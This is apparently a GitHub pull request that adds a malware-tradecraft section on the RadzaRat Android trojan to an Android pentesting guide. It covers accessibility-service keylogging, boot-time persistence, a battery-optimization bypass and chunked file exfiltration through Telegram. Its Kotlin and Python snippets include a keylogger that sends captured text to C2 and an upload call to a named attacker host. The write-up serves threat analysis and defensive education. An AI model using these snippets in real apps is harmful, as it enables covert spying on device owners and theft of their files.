Skip to content

RadzaRat New Android Trojan Disguised as File Manager Emerge... #1600

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
wants to merge 1 commit into from
Closed

RadzaRat New Android Trojan Disguised as File Manager Emerge... #1600

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
71 changes: 71 additions & 0 deletions src/mobile-pentesting/android-app-pentesting/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -54,6 +54,76 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```

## Android Malware Tradecraft: Accessibility, Persistence & C2

### Accessibility Service Abuse for Keylogging and UI Monitoring

Recent Android RATs (e.g., RadzaRat) ship fake productivity apps that immediately prompt victims to enable a custom `AccessibilityService` (`MyAccessibilityService` declared with `BIND_ACCESSIBILITY_SERVICE`). Once granted, the service listens for `TYPE_VIEW_TEXT_CHANGED`, `TYPE_VIEW_TEXT_SELECTION_CHANGED`, and `TYPE_WINDOW_STATE_CHANGED`, letting operators keylog **any** app without root while capturing package names, view IDs, coordinates, and UI state.

```kotlin
class SpyService: AccessibilityService() {
override fun onAccessibilityEvent(e: AccessibilityEvent) {
if (e.eventType == TYPE_VIEW_TEXT_CHANGED && e.text.isNotEmpty()) {
val log = mapOf("pkg" to e.packageName, "text" to e.text.joinToString(""),
"viewId" to (e.source?.viewIdResourceName ?: ""))
sendToC2("keylog", log)
}
}
}
```

Correlate the captured buffers with `TYPE_VIEW_FOCUSED` events to identify the active banking view before firing automated gestures.

### Android Persistence via Boot Receivers, Foreground Services & Battery Optimization Bypass

RadzaRat demonstrates that **no kernel exploit is required** to stay resident indefinitely:

- `RECEIVE_BOOT_COMPLETED` + `RECEIVE_LOCKED_BOOT_COMPLETED` with a `BootReceiver` lets the malware start before the user unlocks the phone.
- The receiver immediately launches a foreground data-sync service registered with `FOREGROUND_SERVICE`, `FOREGROUND_SERVICE_DATA_SYNC`, or even `FOREGROUND_SERVICE_MEDIA_PROJECTION` so Android treats it as high priority.
- `REQUEST_IGNORE_BATTERY_OPTIMIZATIONS` combined with `WAKE_LOCK` keeps logging/exfil tasks alive even under Doze.
- A `DeviceAdminReceiver` (e.g., `MyDeviceAdminReceiver`) hardens removal: the RAT can prevent forced uninstalls or trigger lock/policy changes to re-prompt for credentials.

```kotlin
class BootReceiver: BroadcastReceiver() {
override fun onReceive(ctx: Context, intent: Intent) {
if (intent.action in setOf(ACTION_BOOT_COMPLETED, ACTION_LOCKED_BOOT_COMPLETED)) {
ctx.startForegroundService(Intent(ctx, SyncService::class.java))
}
}
}
```

```kotlin
fun requestDozeBypass(ctx: Context) {
val pm = ctx.getSystemService(PowerManager::class.java)
if (!pm.isIgnoringBatteryOptimizations(ctx.packageName)) {
val i = Intent(ACTION_REQUEST_IGNORE_BATTERY_OPTIMIZATIONS)
i.data = Uri.parse("package:${ctx.packageName}")
ctx.startActivity(i.addFlags(FLAG_ACTIVITY_NEW_TASK))
}
}
```

The above combo plus `SYSTEM_ALERT_WINDOW` overlays ensures the RAT auto-recovers after reboots, resists termination, and can socially-engineer users into granting every dangerous permission again if Android ever revokes them.

### Low-Cost C2 & Chunked Large-Volume Storage Exfiltration

RadzaRat’s operator only needed a free [Render.com](https://render.com) web service and a Telegram bot to achieve full remote control:

1. The APK abuses `MANAGE_EXTERNAL_STORAGE` to enumerate gigabytes of shared files through its `FileManagerActivity` facade.
2. Exfiltration is split into `/upload` (small objects) and `/upload_chunked` (multi-gig archives) HTTP endpoints hosted on Render (`telegram-bot-go-3hwv.onrender.com`, `telegram-bot-xftw.onrender.com`).
3. Each chunk POST includes metadata such as `device_id`, `path`, `chunk_index`, and `sha256`, allowing 10+ GB transfers without raising single-request alerts.
4. The backend forwards every chunk or keystroke to the operator via the Telegram Bot API (`sendDocument`, `sendMessage`), leveraging Telegram’s ubiquitous TLS traffic to blend in.

```python
files = {"chunk": open(part, "rb")}
payload = {"device": d, "path": rel, "chunk_index": idx}
requests.post("https://telegram-bot-xftw.onrender.com/upload_chunked",
data=payload, files=files, timeout=30)
```

Stacking `BIND_ACCESSIBILITY_SERVICE`, `SYSTEM_ALERT_WINDOW`, Device Admin, `REQUEST_IGNORE_BATTERY_OPTIMIZATIONS`, and `MANAGE_EXTERNAL_STORAGE` keeps the sideloaded RAT resilient while its Telegram Bot API C2 blends into ubiquitous TLS traffic.

## Case Studies & Vulnerabilities


Expand Down Expand Up @@ -874,5 +944,6 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
- [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
- [CoRPhone — Android in-memory JNI execution and packaging pipeline](https://github.com/0xdevil/corphone)
- [RadzaRat: New Android Trojan Disguised as File Manager Emerges with Zero Detection Rate](https://www.certosoftware.com/insights/radzarat-new-android-trojan-disguised-as-file-manager-emerges-with-zero-detection-rate/)

{{#include ../../banners/hacktricks-training.md}}